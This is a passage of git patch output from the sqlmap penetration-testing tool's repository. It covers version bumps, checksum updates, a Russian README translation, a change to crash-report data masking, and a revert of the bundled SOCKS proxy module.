insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 24ef311de60..30f0d219219 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.15" +VERSION = "1.2.5.16" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/versioncheck.py b/lib/utils/versioncheck.py index e9f413c6c8a..4cbecb0dc72 100644 --- a/lib/utils/versioncheck.py +++ b/lib/utils/versioncheck.py @@ -12,7 +12,7 @@ if PYVERSION >= "3" or PYVERSION < "2.6": exit("[CRITICAL] incompatible Python version detected ('%s'). To successfully run sqlmap you'll have to use version 2.6.x or 2.7.x (visit 'https://www.python.org/downloads/')" % PYVERSION) -extensions = ("bz2", "gzip", "ssl", "sqlite3", "zlib") +extensions = ("bz2", "gzip", "pyexpat", "ssl", "sqlite3", "zlib") try: for _ in extensions: __import__(_) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 8d1d6f4214f..9f3bf778ebe 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -61a242f506d7e3374230b2e904ea309b lib/core/settings.py +428225201b9174a4c4432d9d2e528a91 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -115,7 +115,7 @@ cc1cfe36057f1d9bbdcba1bcc03359f9 lib/utils/hash.py 2c5a655c8e94cbe2664ee497752ac1f2 lib/utils/search.py 571884f530796534f03c49cf3f380a4c lib/utils/sqlalchemy.py dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py -3d230e342a6c8d60ac7c68c556fbba9b lib/utils/versioncheck.py +fad14adffa8b640a15b06db955031695 lib/utils/versioncheck.py 7348ee704485651737ddbe3538271be9 lib/utils/xrange.py b9d2761f47fec3d98b88311a263fd5db plugins/dbms/access/connector.py 3f1c50a1507d1c2f69c20c706230e2e2 plugins/dbms/access/enumeration.py From 1ecc3267145fc1348f0652eda4d2ee5a9e654682 Mon Sep 17 00:00:00 2001 From: German Date: Thu, 24 May 2018 11:11:09 +0300 Subject: [PATCH 141/428] Russian localization readme (#3116) * add russian doc readme * add link head readme --- README.md | 1 + doc/translations/README-ru-RUS.md | 69 +++++++++++++++++++++++++++++++ 2 files changed, 70 insertions(+) create mode 100644 doc/translations/README-ru-RUS.md diff --git a/README.md b/README.md index b125d1561cc..5c4e2832526 100644 --- a/README.md +++ b/README.md @@ -54,6 +54,7 @@ Links Translations ---- +* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RUS.md) * [Bulgarian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md) * [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md) * [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md) diff --git a/doc/translations/README-ru-RUS.md b/doc/translations/README-ru-RUS.md new file mode 100644 index 00000000000..281a4de32f6 --- /dev/null +++ b/doc/translations/README-ru-RUS.md @@ -0,0 +1,69 @@ +# sqlmap + +[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +sqlmap - это инструмент для тестирования уязвимостей с открытым исходным кодом, который автоматизирует процесс обнаружения и использования ошибок SQL-инъекций и захвата серверов баз данных. Он оснащен мощным механизмом обнаружения, множеством приятных функций для профессионального тестера уязвимостей и широким спектром скриптов, которые упрощают работу с базами данных, от сбора данных из базы данных, до доступа к базовой файловой системе и выполнения команд в операционной системе через out-of-band соединение. + +**Проект sqlmap спонсируется [Netsparker Web Application Security Scanner](https://www.netsparker.com/?utm_source=github.com&utm_medium=referral&utm_content=sqlmap+repo&utm_campaign=generic+advert).** + +Скриншоты +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Вы можете посетить [набор скриншотов](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) демонстрируемые некоторые функции в wiki. + +Установка +---- + +Вы можете скачать последнюю версию tarball, нажав [сюда](https://github.com/sqlmapproject/sqlmap/tarball/master) или последний zipball, нажав [сюда](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Предпочтительно вы можете загрузить sqlmap, клонируя [Git](https://github.com/sqlmapproject/sqlmap) репозиторий: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap работает из коробки с [Python](http://www.python.org/download/) версии **2.6.x** и **2.7.x** на любой платформе. + +Использование +---- + +Чтобы получить список основных опций и вариантов выбора, используйте: + + python sqlmap.py -h + +Чтобы получить список всех опций и вариантов выбора, используйте: + + python sqlmap.py -hh + +Вы можете найти пробный запуск [тут](https://asciinema.org/a/46601). +Чтобы получить обзор возможностей sqlmap, список поддерживаемых функций и описание всех параметров и переключателей, а также примеры, вам рекомендуется ознакомится с [пользовательским мануалом](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Ссылки +---- + +* Основной сайт: http://sqlmap.org +* Скачивание: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) или [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Канал новостей RSS: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Отслеживание проблем: https://github.com/sqlmapproject/sqlmap/issues +* Пользовательский мануал: https://github.com/sqlmapproject/sqlmap/wiki +* Часто задаваемые вопросы (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* Twitter: [@sqlmap](https://twitter.com/sqlmap) +* Демки: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* Скриншоты: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots + +Переводы +---- + +* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RUS.md) +* [Bulgarian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md) +* [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md) +* [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md) +* [French](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md) +* [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md) +* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md) +* [Italian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md) +* [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md) +* [Polish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pl-PL.md) +* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md) +* [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md) +* [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md) From 2abc7fc5881359288e267dcb782d025628b0328f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 24 May 2018 10:13:13 +0200 Subject: [PATCH 142/428] Update related to the #3116 (consistency patch) --- README.md | 2 +- doc/translations/README-ru-RUS.md | 19 ------------------- lib/core/settings.py | 2 +- txt/checksum.md5 | 2 +- 4 files changed, 3 insertions(+), 22 deletions(-) diff --git a/README.md b/README.md index 5c4e2832526..f1e5198d968 100644 --- a/README.md +++ b/README.md @@ -54,7 +54,6 @@ Links Translations ---- -* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RUS.md) * [Bulgarian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md) * [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md) * [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md) @@ -65,5 +64,6 @@ Translations * [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md) * [Polish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pl-PL.md) * [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md) +* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RUS.md) * [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md) * [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md) diff --git a/doc/translations/README-ru-RUS.md b/doc/translations/README-ru-RUS.md index 281a4de32f6..4e46b296025 100644 --- a/doc/translations/README-ru-RUS.md +++ b/doc/translations/README-ru-RUS.md @@ -4,8 +4,6 @@ sqlmap - это инструмент для тестирования уязвимостей с открытым исходным кодом, который автоматизирует процесс обнаружения и использования ошибок SQL-инъекций и захвата серверов баз данных. Он оснащен мощным механизмом обнаружения, множеством приятных функций для профессионального тестера уязвимостей и широким спектром скриптов, которые упрощают работу с базами данных, от сбора данных из базы данных, до доступа к базовой файловой системе и выполнения команд в операционной системе через out-of-band соединение. -**Проект sqlmap спонсируется [Netsparker Web Application Security Scanner](https://www.netsparker.com/?utm_source=github.com&utm_medium=referral&utm_content=sqlmap+repo&utm_campaign=generic+advert).** - Скриншоты ---- @@ -50,20 +48,3 @@ sqlmap работает из коробки с [Python](http://www.python.org/do * Twitter: [@sqlmap](https://twitter.com/sqlmap) * Демки: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) * Скриншоты: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots - -Переводы ----- - -* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RUS.md) -* [Bulgarian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md) -* [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md) -* [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md) -* [French](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md) -* [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md) -* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md) -* [Italian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md) -* [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md) -* [Polish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pl-PL.md) -* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md) -* [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md) -* [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md) diff --git a/lib/core/settings.py b/lib/core/settings.py index 30f0d219219..3cbde7825f5 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.16" +VERSION = "1.2.5.17" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 9f3bf778ebe..9e860752bfb 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -428225201b9174a4c4432d9d2e528a91 lib/core/settings.py +71c3a9f3ca42c55ecf3fc1d6dcffc6a3 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py From 42042fb5deb3698e1da2507c53be78ca6176ecd5 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 24 May 2018 10:41:20 +0200 Subject: [PATCH 143/428] Removing encoding report part (enough time has been passed to collect major problems) --- lib/core/settings.py | 2 +- lib/request/basic.py | 4 ---- txt/checksum.md5 | 4 ++-- 3 files changed, 3 insertions(+), 7 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 3cbde7825f5..3302e0d607f 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.17" +VERSION = "1.2.5.18" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/basic.py b/lib/request/basic.py index 1fe7fd8d3cf..0eb60e630a3 100644 --- a/lib/request/basic.py +++ b/lib/request/basic.py @@ -220,10 +220,6 @@ def checkCharEncoding(encoding, warn=True): try: codecs.lookup(encoding.encode(UNICODE_ENCODING) if isinstance(encoding, unicode) else encoding) except (LookupError, ValueError): - if warn and ' ' not in encoding: - warnMsg = "unknown web page charset '%s'. " % encoding - warnMsg += "Please report by e-mail to '%s'" % DEV_EMAIL_ADDRESS - singleTimeLogMessage(warnMsg, logging.WARN, encoding) encoding = None if encoding: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 9e860752bfb..cb29aec6050 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -71c3a9f3ca42c55ecf3fc1d6dcffc6a3 lib/core/settings.py +c7f07cb1ca744abc129e58828107d119 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -67,7 +67,7 @@ fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py 492654567e72b6a14584651fcd9f16e6 lib/parse/sitemap.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py -596988f14408cde1a2d3b5c9f231873a lib/request/basic.py +7a779e6bdf582b8ceb6d640cf869ac10 lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py 0ad9051e84e8fefe826f1a574b41b1b0 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py From 6b3f01bfebb7f1393db6b07d944cdd94903d4ce2 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 28 May 2018 11:07:06 +0200 Subject: [PATCH 144/428] Minor patch --- lib/controller/checks.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index d1a26ade315..25ab83be194 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -783,7 +783,7 @@ def genCmpPayload(): if conf.multipleTargets: msg = "how do you want to proceed? [ne(X)t target/(s)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]" - choice = readInput(msg, default='T', checkBatch=False).upper() + choice = readInput(msg, default='X', checkBatch=False).upper() else: msg = "how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]" choice = readInput(msg, default='S', checkBatch=False).upper() diff --git a/lib/core/settings.py b/lib/core/settings.py index 3302e0d607f..e2980c36603 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.18" +VERSION = "1.2.5.19" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index cb29aec6050..3f81ab94f13 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -22,7 +22,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -a0ae21cc46b8f5fd0afe0a173ceaab70 lib/controller/checks.py +9682b922fd621d31708d562b15803202 lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -c7f07cb1ca744abc129e58828107d119 lib/core/settings.py +6a2a60449aa91aa8f605e6c5582a01d7 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py From 80f3b9a711c57609d2ba6ba91f4f0d00bb9504e1 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 28 May 2018 11:10:42 +0200 Subject: [PATCH 145/428] Minor worflow change in case of unhandled exceptions (disregard --batch) --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index dd504674269..724ce5e153b 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -3367,7 +3367,7 @@ def createGithubIssue(errMsg, excMsg): msg += "with the unhandled exception information at " msg += "the official Github repository? [y/N] " try: - choice = readInput(msg, default='N', boolean=True) + choice = readInput(msg, default='N', checkBatch=False, boolean=True) except: choice = None diff --git a/lib/core/settings.py b/lib/core/settings.py index e2980c36603..17b736c38ce 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.19" +VERSION = "1.2.5.20" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 3f81ab94f13..466c3d6e17e 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py b1990c7805943f0c973a853bba981d96 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -3418e7b81884c1908dca632c590495ab lib/core/common.py +cdc5973df09133636116e6b700483c0d lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -6a2a60449aa91aa8f605e6c5582a01d7 lib/core/settings.py +d195239c04a99ffffe252fbaa768f382 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py From 18706f7fad24eea4f39f36cf1cc9ede9122389f6 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 28 May 2018 11:29:06 +0200 Subject: [PATCH 146/428] Minor patch for unhandled exception reports --- lib/core/common.py | 8 ++++---- lib/core/settings.py | 4 ++-- txt/checksum.md5 | 4 ++-- 3 files changed, 8 insertions(+), 8 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 724ce5e153b..8b099c10cb7 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -3434,10 +3434,10 @@ def maskSensitiveData(msg): value = extractRegexResult(regex, retVal) retVal = retVal.replace(value, '*' * len(value)) - if not conf.get("hostname"): - match = re.search(r"(?i)sqlmap.+(-u|--url)(\s+|=)([^ ]+)", retVal) - if match: - retVal = retVal.replace(match.group(3), '*' * len(match.group(3))) + # Just in case (for problematic parameters regarding user encoding) + match = re.search(r"(?i)[ -]-(u|url|data|cookie)( |=)(.*?)( -?-[a-z]|\Z)", retVal) + if match: + retVal = retVal.replace(match.group(3), '*' * len(match.group(3))) if getpass.getuser(): retVal = re.sub(r"(?i)\b%s\b" % re.escape(getpass.getuser()), '*' * len(getpass.getuser()), retVal) diff --git a/lib/core/settings.py b/lib/core/settings.py index 17b736c38ce..3ce328d2ffd 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.20" +VERSION = "1.2.5.21" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -367,7 +367,7 @@ SENSITIVE_DATA_REGEX = "(\s|=)(?P[^\s=]*%s[^\s]*)\s" # Options to explicitly mask in anonymous (unhandled exception) reports (along with anything carrying the inside) -SENSITIVE_OPTIONS = ("hostname", "data", "dnsDomain", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "rFile", "wFile", "dFile", "testParameter", "authCred") +SENSITIVE_OPTIONS = ("hostname", "answers", "data", "dnsDomain", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "rFile", "wFile", "dFile", "testParameter", "authCred") # Maximum number of threads (avoiding connection issues and/or DoS) MAX_NUMBER_OF_THREADS = 10 diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 466c3d6e17e..8b0280b75a4 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py b1990c7805943f0c973a853bba981d96 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -cdc5973df09133636116e6b700483c0d lib/core/common.py +240cb11db16783c6601b1d7de5eadd8d lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -d195239c04a99ffffe252fbaa768f382 lib/core/settings.py +2adfff188eafd6ea877686823cb44eb9 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py From ca8b589d43893a0a4cd44e6bc1570ffd652cebc1 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 29 May 2018 14:26:31 +0200 Subject: [PATCH 147/428] Fixes #3122 (by reverting 6c4e9ae427fa6ae985b05f2a979edcdf062868e5) --- lib/core/settings.py | 2 +- thirdparty/socks/socks.py | 970 ++++++++++++-------------------------- txt/checksum.md5 | 4 +- 3 files changed, 307 insertions(+), 669 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 3ce328d2ffd..1539dcd392b 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.21" +VERSION = "1.2.5.22" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/thirdparty/socks/socks.py b/thirdparty/socks/socks.py index 4dab15a1ef1..2eaf223d875 100644 --- a/thirdparty/socks/socks.py +++ b/thirdparty/socks/socks.py @@ -1,6 +1,7 @@ -""" -SocksiPy - Python SOCKS module. -Version 1.5.7 +#!/usr/bin/env python + +"""SocksiPy - Python SOCKS module. +Version 1.00 Copyright 2006 Dan-Haim. All rights reserved. @@ -29,7 +30,11 @@ This module provides a standard socket-like interface for Python for tunneling connections through SOCKS proxies. -=============================================================================== +""" + +""" +Minor modifications made by Miroslav Stampar (http://sqlmap.org/) +for patching DNS-leakage occuring in socket.create_connection() Minor modifications made by Christopher Gilbert (http://motomastyle.com/) for use in PyLoris (http://pyloris.sourceforge.net/) @@ -37,735 +42,368 @@ Minor modifications made by Mario Vilas (http://breakingcode.wordpress.com/) mainly to merge bug fixes found in Sourceforge -Modifications made by Anorov (https://github.com/Anorov) --Forked and renamed to PySocks --Fixed issue with HTTP proxy failure checking (same bug that was in the old ___recvall() method) --Included SocksiPyHandler (sockshandler.py), to be used as a urllib2 handler, - courtesy of e000 (https://github.com/e000): https://gist.github.com/869791#file_socksipyhandler.py --Re-styled code to make it readable - -Aliased PROXY_TYPE_SOCKS5 -> SOCKS5 etc. - -Improved exception handling and output - -Removed irritating use of sequence indexes, replaced with tuple unpacked variables - -Fixed up Python 3 bytestring handling - chr(0x03).encode() -> b"\x03" - -Other general fixes --Added clarification that the HTTP proxy connection method only supports CONNECT-style tunneling HTTP proxies --Various small bug fixes """ -__version__ = "1.5.7" - import socket import struct -from errno import EOPNOTSUPP, EINVAL, EAGAIN -from io import BytesIO -from os import SEEK_CUR -from collections import Callable -from base64 import b64encode - -PROXY_TYPE_SOCKS4 = SOCKS4 = 1 -PROXY_TYPE_SOCKS5 = SOCKS5 = 2 -PROXY_TYPE_HTTP = HTTP = 3 -PROXY_TYPES = {"SOCKS4": SOCKS4, "SOCKS5": SOCKS5, "HTTP": HTTP} -PRINTABLE_PROXY_TYPES = dict(zip(PROXY_TYPES.values(), PROXY_TYPES.keys())) +PROXY_TYPE_SOCKS4 = 1 +PROXY_TYPE_SOCKS5 = 2 +PROXY_TYPE_HTTP = 3 +_defaultproxy = None socket._orig_socket = _orgsocket = _orig_socket = socket.socket _orgcreateconnection = socket.create_connection -class ProxyError(IOError): - """ - socket_err contains original socket.error exception. - """ - def __init__(self, msg, socket_err=None): - self.msg = msg - self.socket_err = socket_err - - if socket_err: - self.msg += ": {0}".format(socket_err) - - def __str__(self): - return self.msg - +class ProxyError(Exception): pass class GeneralProxyError(ProxyError): pass -class ProxyConnectionError(ProxyError): pass -class SOCKS5AuthError(ProxyError): pass -class SOCKS5Error(ProxyError): pass -class SOCKS4Error(ProxyError): pass +class Socks5AuthError(ProxyError): pass +class Socks5Error(ProxyError): pass +class Socks4Error(ProxyError): pass class HTTPError(ProxyError): pass -SOCKS4_ERRORS = { 